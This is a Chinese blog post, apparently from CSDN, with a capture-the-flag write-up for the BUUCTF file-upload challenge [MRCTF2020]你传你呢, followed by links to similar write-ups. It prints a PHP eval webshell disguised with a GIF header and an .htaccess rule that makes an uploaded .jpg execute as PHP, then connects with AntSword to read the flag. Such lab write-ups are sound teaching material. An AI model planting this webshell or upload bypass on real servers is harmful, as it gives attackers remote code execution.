[MRCTF2020]你传你呢

最新推荐文章于 2024-07-08 19:08:19 发布
最新推荐文章于 2024-07-08 19:08:19 发布
阅读量321 收藏 1
点赞数 13
分类专栏: CTF 文章标签: http 网络 网络协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2303_77380355/article/details/137207355
版权

先尝试普通php文件(抓包绕过一下前端),把各种双写,大小写,空格绕过都试一遍,都失败了

用图片格式成功(文件大小不能过大)了

上传一句话木马,将下面内容保存为xx(任意名称).jpg

GIF89a?

<script  language="php">eval($_POST['66']);</script>

用burpsuite抓包,修改文件类型,抓到包后将包发送给重放器

修改文件后缀,但是php php2 phtml 这些文件的后缀名都不能绕过检测

看了其他博主的WP知道了,能用.htaccess解析漏洞,所以使用.htaccess绕过

.htaccess绕过,只要有这个配置文件,并且内容为“AddType application/x-httpd-php .jpg(就是把所以jpg后缀的文件全都当作php文件来执行)”

写.htaccess代码,代码的意思为将当前目录下文件名为2.png的文件当成php来解析

<FilesMatch "2.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

因为2.jpg之前已经上传成功了,2.jpg文件已经在目录下了,所以不用再次上传2.jpg文件了,只需上传.htaccess文件就行

上传.htaccess文件需要修改文件类型

成功上传,使用蚁剑链接

URL地址就是http://10f3bc62-83f8-4d76-a114-c479d0c0295d.node5.buuoj.cn:81/upload/2.png

密码是POST里的数 

可以看到刚才上传的文件

flag在根目录

flag{f9a4f467-d67f-4557-909a-5f5ad42bd83c}

关注
  • 13
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
web:[MRCTF2020]你你呢
sleepywin的博客
10-10 601
这里参考了大佬的wp,上一个.htaccess文件,这个.htaccess文件的作用就是把这个图片文件解析成php代码执行。上文件,先随便上一个文件看看情况。.htaccess文件的内容为。回显一片空白,说明木马上成功。构造含有一句话木马的图片上。这里用bp抓包修改类型。在根目录找到flag。
[MRCTF2020]你你呢 1
qq_43618536的博客
07-03 1041
BUUCTF的[MRCTF2020]你你🐎呢 1
【BUUCTF之[MRCTF2020]你你呢 1】
qq_40646572的博客
10-25 5294
首先,正常上图片文件,竟然因为文件大小的问题,上失败,就挺难受。不过还好,总算知道是什么原因不能上。总体来讲,这道题,难度是可以的,需要一步步的进行尝试。
[MRCTF2020]你你呢1
:-)
03-31 1562
[MRCTF2020]你你????呢1 STEP1:尝试改写文件头和和文件内容 显示: 判断可能与user.ini或.htaccess文件有关 STEP2:上.htaccess文件 显示: 上成功,上一个1.png文件 STEP3:上1.png文件包含一句木马 显示: STEP4:蚁剑连接 显示: 得到flag ...
BUUCTF之[MRCTF2020]你你呢 1
qq_44122254的博客
02-10 1953
打开题目靶场,发现是一个上页面 随便上一个文件进行试验一下 发现对此文件有进行过滤 上一个图片进行尝试,发现可以上png图片,制作图片码进行上 图片码内容如下 发现可以上成功但是蚁剑连接的话并不能够连接成功,数据为空 ...
Buuctf:[MRCTF2020]你你呢
fcz___的博客
03-11 259
然后你会发现无论你怎么改后缀,怎么改语法,就是无法链接蚁剑。我们就得尝试用.user.iniwen文件或者.htaccess文件把我们入的php代码执行了。我们也不知道网站目录上有没有php文件所以我们尝试用.htaccess文件。好的,可以看到文件路径为/upload/17f10253549cad63de6355a3b577ad74/a.png。我们打开蚁剑,添加数据。然后我们上我们的一句话木马文件a.png。我们先上一个图片试试。然后改文名件改为a.png`然后上。我们上.htaccess。
[MRCTF2020]你你马呢解题
Bird&Bird
10-28 556
1、首先右键查看页面源代码,可知后端支持PHP。 2、上一句话木马,果断报错了 3、将文件后缀名修改为php3/php4/php5/phtml后,在上,仍然报错。 4、那上.htaccess文件试试吧 SetHandler application/x-httpd-php bp抓包,修改filename=".htaccess" 报错了,怀疑是对Content-Type做了过滤,将Content-Type修改为image/jpeg后在上,上成功了。 ...
BUUCTF——[MRCTF2020]你你呢 1
weixin_45864041的博客
09-28 1262
php文件格式的一句话木马。 上失败。那就先jpg文件 发现上成功。然后我们可以先把路径保存下来。 接下来我们再试一下可不可以通过抓包修改的方式上php文件。 发现上失败。然后,我们又得变换思路了。上一篇文章,我们知道目录下有一个index.php文件,然后我们通过上.user.ini文件让图片被当做php文件解析。接下来我想到一个思路,那就是.htaccess文件。.htaccess文件可以用来留后门和针对黑名单绕过,可以在.htaccess 加入php解析规则,就能够使上的jpg/.
【菜鸡练习】MRCTF2020你你码呢
kawayiUU的博客
03-18 388
可以看到直接上.htaccess文件是不行的,原因是存在mime过滤,默认设置只允许jpg、gif、bmp类型文件通过过滤。所以我们修改Content-Type类型为image/jpeg ,再上.htaccess文件。访问刚刚上成功的file.jpg,页面全白,意思是我们上的file.jpg已经当成php解析。注意在kali下默认会将 .开头的文件隐藏,修改查看方式即可看见新建的.htaccess文件。看页面是一个文件上漏洞的题目,文件上的基本思路有很多,本题通关点在。在根目录下找到flag。
vigenere-cipher:Vigenere密码
03-19
它由重复26行/列的字母表组成,但是第一个字母被推到字母表的末尾,并且一直持续到z是第25行中的第一个字母为止。然后,程序将密钥用于行,将消息加密用于列。字母匹配,并显示加密的消息。标点和空格保持不变。
采区含断层工作面冲击失稳预测
04-19
本文以矿井西二采区某一工作面为工程背景,根据数值模拟峰前扰动时断层面应力、位移分叉趋势对断层冲击地压危险区域进行了初步划分,通过现场电磁辐射监测结果分析可知:预测的预警距离是工作面距断层35m时应当采取加强...
CTF 逆向练习-Transform
06-10
该资源配合博客使用,博客我还没写。 有空我会在哔哩哔哩录制教程。
向前欧拉法matlab代码-zbc-ops:我的GitHub个人资料的配置文件
05-20
向前欧拉法matlab代码 本周还是刷题,深入学习了winner攻击以及extend winner attack.然后就是做了几个有关造格子的题,没学很多,挺忙的。 直接从博客复制过来的,格式和markdown显示有点...选择不同的素数对,$l
Web 基础与 HTTP 协议
m0_74860678的博客
07-03 1234
网页纯文本格式文件编写语言为HTML在用户的浏览器中被 “翻译” 成网页形式显示出来网站由一个一个页面构成的,是多个网页的结合体主页打开网站后出现的第一个网页称为网站主页(或首页)域名浏览网页时输入的网址HTTP80/TCP用来输网页的通信协议HTTPS443/TCP用于加密URL是一种万维网寻址系统网页是一个文件,他存放在世界某个角落的某一部计算机中,而这部计算机必须是与互联网相连的。网页经由网址(URL)来识别与存取,是互联网中的一“页”。
HTTP Client
最新发布
Mr.xing的博客
07-08 69
从jdk9开始引入HTTP Client 标准化,根据用户的反馈在jdk10开始更新,有了显著的改进,使用方式基本保持不变。通过CompletableFutures提供了非阻塞请求和响应式。流量控制可以在java.util.concurrent.Flow API 提供支持。在jdk9和jdk10时进行时几乎完全重写了实现,实现了完全异步,以前的http1.1实现是阻塞的,RX Flow概念的使用已经实现,现在可以更容易的跟踪数据流:从用户请求发布者和响应订阅者,一直到底层套接字。
使用Java和Apache HttpClient进行HTTP POST请求示例
marsjin的专栏
07-05 369
在Java应用程序中,使用Apache HttpClient库进行HTTP POST请求是非常常见和有用的。本文将展示如何使用Apache HttpClient库发送带有JSON数据的POST请求,并处理返回的响应。
HTTP-概述
weixin_63680330的博客
07-06 315
Hyper Text Transfer Protocol,超文本输协议,规定了浏览器和服务器之间数据输的规则。原始数据格式。
FTP、http 、tcp
u013400314的博客
07-05 550
FTP: File Transfer Protocol 文件输协议, 基于TCP协议, 基于UDP协议的FTP 叫做 TFTP。FTP 协议中将控制命令、数据分开输的方法,为了提高效率,FTP协议要创建2个SOCKET TCP连接,占用2个TCP,HTTP :HyperText Transfer Protocol 超文本输协议,是基于TCP协议。HTTP 协议 通过一个SOCKET连接输依次会话数据。另外有若干个从属进程,负责处理单个请求。一个主进程,负责接收新的请求。
buuctf misc [MRCTF2020]ezmisc 1
05-16
这是一个关于MRCTF2020比赛的misc题目,题目名称为ezmisc 1。不知道你需要什么样的帮助,我可以给你一些关于此题的信息。 题目描述: There are some problems to solve! Each problem corresponds to a flag. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值